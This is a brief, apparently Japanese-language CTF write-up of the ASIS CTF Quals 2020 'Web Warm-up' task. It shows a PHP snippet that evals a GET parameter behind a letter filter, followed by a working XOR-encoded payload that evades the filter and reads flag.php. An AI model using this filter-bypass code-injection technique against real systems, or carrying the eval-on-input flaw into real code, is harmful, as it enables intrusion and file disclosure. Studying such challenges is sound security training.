CTFtime.org / ASIS CTF Quals 2020 / Web Warm-up

Warm up! Can you break all the tasks? I'll pray for you!
read flag.php
Link: http://69.90.132.196:5003/?view-source

ソースコードを見せてくれる。

if(isset($_GET['warmup'])){
    if(!preg_match('/[A-Za-z]/is',$_GET['warmup']) && strlen($_GET['warmup']) <= 60) {
    eval($_GET['warmup']);
    }else{
        die("Try harder!");
    }
}else{
    die("No param given");
}

アルファベットが使えず60文字以内に納めないといけないみたい。
ググる。
[PHP-CTF] No letter without digital webshell - Programmer Sought
これはよさそう。

色々やってみて、以下でフラグが取れた。

?warmup=$__="`{{{"^"?<>/";${$__}[%27_%27](${$__}[%27__%27]);&_=highlight_file&__=flag.php